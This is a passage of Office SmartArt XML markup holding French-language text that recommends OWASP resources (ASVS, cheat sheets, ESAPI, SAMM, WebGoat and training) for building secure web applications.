    <dgm:cxn modelId="{60522597-A0FC-4303-B232-68C723F82950}" type="presParOf" srcId="{08B3E8E4-0A68-4271-BBB4-E93B6D85CD3F}" destId="{AF125120-BBE5-4C6D-A4D9-AA1EC3299EDE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F9A2A868-AE51-4E0A-9CD1-26DBEE558B6B}" type="presParOf" srcId="{08B3E8E4-0A68-4271-BBB4-E93B6D85CD3F}" destId="{4D86F0FC-F50F-41D3-A81F-CF4A5F22CAC5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D7288062-5FB1-44EA-BB44-55C753E5FF3F}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{5A8EE57E-71C8-45FF-8F85-DB1D3B00675A}" srcOrd="15" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1904B415-641F-4A20-8B78-10976D22272C}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D5D73147-C71B-4BD4-8E5F-9AFBE1BC12F1}" srcOrd="16" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D89974E4-42ED-44E3-BE9A-E2BC83845F71}" type="presParOf" srcId="{D5D73147-C71B-4BD4-8E5F-9AFBE1BC12F1}" destId="{F4FC3D9E-43E9-4607-9C8C-93C2D1D5E198}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0ABA3A08-AB39-4C04-91AF-54FE99000914}" type="presParOf" srcId="{D5D73147-C71B-4BD4-8E5F-9AFBE1BC12F1}" destId="{3AEEED12-760D-417A-B975-196C59CB31B8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{BADCCDC2-8B0E-47CF-860F-AFA7BA87BFE9}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D0CBEA6D-B12F-4310-BB76-D6EA68F3F0F3}" srcOrd="17" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{43EC7B01-53B1-423C-98A3-9CD42A3220B5}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{63747B4C-CE12-46F7-AB53-65F75E33DDD5}" srcOrd="18" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{C6BDDBD5-99E5-4F37-B2E2-79E91D1A98FB}" type="presParOf" srcId="{63747B4C-CE12-46F7-AB53-65F75E33DDD5}" destId="{9ABE634A-56CE-4C59-A76B-EF46EF79F3AF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D1BB140E-5C18-4629-9354-80627076B15D}" type="presParOf" srcId="{63747B4C-CE12-46F7-AB53-65F75E33DDD5}" destId="{5C6BB524-1E1A-40DC-AF21-81BF18606E37}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList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00" b="1" baseline="0" dirty="0" err="1" smtClean="0"/>
            <a:t>Exigences</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>
            <a:t>de </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" err="1" smtClean="0"/>
            <a:t>sécurité</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>
            <a:t> de </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" err="1" smtClean="0"/>
            <a:t>l’application</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>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39F11DF5-92F1-4803-9176-8CE41A00F711}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Afin de produire une application web sécurisée, vous devez d'abord définir ce que cela signifie pour cette application. Utilisez le </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>standard de vérification de la sécurité d'une application (ASVS)</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
            <a:t> comme guide pour déterminer les exigences de sécurité de votre application. </a:t>
          </a:r>
          <a:br>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Si le développement de l’application est sous-traité, utilisez plutôt l'</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId2"/>
            </a:rPr>
            <a:t>annexe contractuelle pour du logiciel sécurisé</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
            <a:t> de l'OWASP.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A80C258-8448-4B2A-A29D-75B427DB2E14}" type="parTrans" cxnId="{DDC2C771-D18B-4F81-9A8C-9226D30F1A3B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0AC1C748-C2BF-49EE-BEA2-E40FA789A0EA}" type="sibTrans" cxnId="{DDC2C771-D18B-4F81-9A8C-9226D30F1A3B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5CF86F3C-C725-40E9-9BD5-DEF8085DEA2E}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>
            <a:t>Architecture</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>
            <a:t> applicative </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" err="1" smtClean="0"/>
            <a:t>sécurisée</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="+mn-cs"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C44C12F1-0403-475A-AE8F-FC6620291395}" type="parTrans" cxnId="{B29B22A2-3156-48F5-A350-963380660B24}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C6F93B38-475D-4104-A89D-89CE58E7B1DF}" type="sibTrans" cxnId="{B29B22A2-3156-48F5-A350-963380660B24}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35005AD2-355F-4221-AFBE-62EE5EE8EED6}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Il est bien plus efficace d’intégrer la sécurité dans une application dès sa conception plutôt que d'identifier les failles et les corriger a posteriori.  </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t>Les aide-mémoire de l'OWASP</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t> ont pour objectif de vous guider dans cette tâche. L’OWASP recommande également la lecture du </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>guide de développement OWASP</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C9DFD859-7C28-4046-AE98-F24823BD2FCA}" type="parTrans" cxnId="{EAA6F69C-B5ED-43A6-B7AF-84BF5CD6BBEC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DC2A79BE-AD63-4ED9-B55E-16C3C2F46D7D}" type="sibTrans" cxnId="{EAA6F69C-B5ED-43A6-B7AF-84BF5CD6BBEC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DB4CDFA1-2818-4A44-954F-EB22B78FAC9C}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" err="1" smtClean="0"/>
            <a:t>Contrôles</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>
            <a:t> de</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" err="1" smtClean="0"/>
            <a:t>sécurité</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" err="1" smtClean="0"/>
            <a:t>communs</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{78BDE72E-320A-45A2-9C00-71C161400527}" type="parTrans" cxnId="{A9C19672-C679-460C-9FE3-F6008C0FDA2E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{48C4FD2A-4FFD-49E2-8C3B-E8FB5C35EE2E}" type="sibTrans" cxnId="{A9C19672-C679-460C-9FE3-F6008C0FDA2E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E9B37935-A190-492F-89CA-C506985D7367}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
            <a:t>Il est particulièrement difficile de concevoir des contrôles de sécurité fiables et simples à utiliser. La fourniture d'un jeu de contrôles standard simplifie radicalement le développement d'applications sécurisées. L'OWASP recommande comme modèle pour le développement sécurisé des APIs de votre application le projet "</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>OWASP Enterprise Security API (ESAPI)</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
            <a:t>". Il inclut des implémentations de référence en </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>Java</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>.NET</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>PHP</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>Classic ASP</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>Python</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
            <a:t> et </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>Cold Fusion</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DF94F857-8D0F-453F-9A65-525077F420EA}" type="parTrans" cxnId="{CCBBEF0D-7BB3-44EA-BD95-BCAEB8FA6D24}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{07F02B5F-B548-4258-8893-06A8F8803A6E}" type="sibTrans" cxnId="{CCBBEF0D-7BB3-44EA-BD95-BCAEB8FA6D24}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{88BEC42B-0235-4112-AA8D-C1D1764EF8E1}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr lIns="0" rIns="0"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>
            <a:t>Cycle de</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" err="1" smtClean="0"/>
            <a:t>développement</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>
        </a:p>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" err="1" smtClean="0"/>
            <a:t>sécurisé</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{671B8E39-0FE0-4EFE-ADB5-69CAB59A0932}" type="parTrans" cxnId="{820E1E9E-430D-44C7-9220-3F902A5D2586}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5EF82AA8-8580-4CBB-94BB-7D5D0BEBEECC}" type="sibTrans" cxnId="{820E1E9E-430D-44C7-9220-3F902A5D2586}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{41C02D83-CEEC-4620-A615-8B5A4D00B738}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
            <a:t>Afin d'améliorer le processus que suit votre organisation pour le développement d'applications, l'OWASP recommande l'"</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId6"/>
            </a:rPr>
            <a:t>OWASP Software Assurance </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId6"/>
            </a:rPr>
            <a:t>Maturity</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId6"/>
            </a:rPr>
            <a:t> Model (SAMM)</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
            <a:t>". Ce modèle aide les organisations à formuler et implémenter une stratégie adaptée aux risques spécifiques auxquels elles sont confrontées.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5B8401E1-D1AE-4822-A27B-6C7F36490558}" type="parTrans" cxnId="{F7B73C40-DD58-41F7-94EB-D126F6E5D054}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{963C0D22-4492-41AE-A9A3-1E59F83BC07A}" type="sibTrans" cxnId="{F7B73C40-DD58-41F7-94EB-D126F6E5D054}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E3D14D2D-CB9A-4BA6-A4F0-30D73ED14363}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>
            <a:t>Formation </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" err="1" smtClean="0"/>
            <a:t>à</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>
            <a:t> la </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" err="1" smtClean="0"/>
            <a:t>sécurité</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>
            <a:t>applicative</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{39506D7C-E801-4EF1-B6DE-EE6CE2183B0C}" type="parTrans" cxnId="{B9B967EE-9801-4D73-AD1E-74E3D6EEE0D5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B0CC77F7-8370-4C79-B175-E8006AF5A824}" type="sibTrans" cxnId="{B9B967EE-9801-4D73-AD1E-74E3D6EEE0D5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0527E629-D6A1-4D08-92A0-442047772A1B}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId7"/>
            </a:rPr>
            <a:t>Le projet éducation de l'OWASP</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
            <a:t> met à disposition des ressources de formation afin d'aider à la sensibilisation des développeurs. Il regroupe une </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId8"/>
            </a:rPr>
            <a:t>liste de présentations</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
            <a:t> à cette fin. Afin de vous confronter aux vulnérabilités les plus courantes, essayez l'</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId9"/>
            </a:rPr>
            <a:t>OWASP WebGoat</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId10"/>
            </a:rPr>
            <a:t>WebGoat.NET</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
            <a:t> ou encore le </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId11"/>
            </a:rPr>
            <a:t>projet applications web défaillantes</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
            <a:t>. Et pour rester à jour, venez assister à une </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId12"/>
            </a:rPr>
            <a:t>conférence AppSec OWASP</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
            <a:t>, une session de formation, ou une </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId13"/>
            </a:rPr>
            <a:t>réunion du chapitre OWASP local</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
        </a:p>
      </dgm:t>
